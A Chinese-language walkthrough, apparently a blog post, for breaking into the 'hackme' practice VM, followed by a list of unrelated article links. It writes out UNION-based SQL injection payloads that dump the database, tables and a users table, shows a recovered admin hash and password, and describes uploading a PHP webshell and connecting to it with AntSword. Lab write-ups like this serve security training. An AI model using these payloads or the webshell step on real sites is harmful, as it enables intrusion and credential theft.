当前位置: 首页 > news >正文

hackme靶机通关攻略

news 2025/7/7 13:52:41
第一步:确定靶机IP

第二步:使用御剑后台扫描工具扫描敏感文件

第三步:访问register.php注册登录,进入welcome.php页面

第四步:访问一个不存在的页面,确定网站使用的中间件是Apache(无用)

第五步:返回welcome.php页面,单点search会出现很多书,推测存在SQL注入漏洞

第六步:确定闭合方式为单引号

第七步:判断字段数为3、判断回显位置

第八步:爆破数据库名、爆破表名、爆破字段名

#爆破数据库名
OSNT' union select database(),2,3#

#爆破表名
OSNT' union select 1,2,table_name from information_schema.tables where table_schema='webapphacking'#

#爆破字段名
OSNT' union select 1,2,column_name from information_schema.columns where table_name='users'#

#爆破敏感信息
OSNT' union select 1,2,group_concat(name,'~',pasword) from users#

#发现管理员账户
superadmin~2386acb2cf356944177746fc92523983

#MD5解密密码
Uncrackable
第九步:登录管理员账户,发现上传文件的地方,尝试直接上传一句话木马shellshellshell.php

第十步:访问http://192.168.0.107/uploads/,发现成功上传,使用蚁剑连接,成功!

                                                                                                                        FROM  IYU_

http://www.dtcms.com/a/67324.html

相关文章:

  • Java数组详解(一)
  • IDE 使用技巧与插件推荐:全面提升开发效率
  • vue3+ts+vite环境中使用json-editor-vue3,记录遇到的奇奇怪怪问题!!!
  • 三格电子Modbus TCP转CANOpen网关相关问答
  • 【vscode-01】vscode不同项目不同语言扩展插件隔离方案
  • 智算新纪元,腾讯云HAI-CPU助力法律援助
  • 提升工地安全:视觉分析助力挖掘机作业监控
  • 夜莺监控 v8.0 新版通知规则 | 对接企微告警
  • 前端面试:如何实现预览 PDF 文件?
  • PostgreSQL 日常SQL语句查询记录--空间查询
  • 单体架构、微服务组件与解决方案
  • 开VR大空间体验馆,如何最低成本获取最大收入?
  • RabbitMQ 实现原理及流程
  • 多线程--参数传递之间的关系
  • react和vue 基础使用对比
  • Docker文件夹上传秘籍Windows下的高效传输之道
  • hcia华为路由器静态路由实验配置
  • 泰山派开发之—Ubuntu24.04下Linux开发环境搭建
  • 如何使用GuzzleHttp库:详细教程与代码示例
  • android 调用wps打开文档并感知保存事件
  • 【RabbitMQ】rabbitmq在spring boot中的使用
  • 回调函数qsort①冒泡排序数组
  • 如何在Futter开发中做性能优化?
  • 个人居家 Web移动端 局域网 远程控制电脑 工具 PC遥控器拿去玩吧
  • Leetcode 刷题笔记1 动态规划part10
  • app.config.globalProperties
  • 机器学习算法——聚类任务
  • Flink 中RocksDB 为什么将每个键和值的限制为 2^31 字节
  • DeepSeek-prompt指令-当DeepSeek答非所问,应该如何准确的表达我们的诉求?
  • Pytorch实现之BCGAN实现双生成器架构的人脸面部生成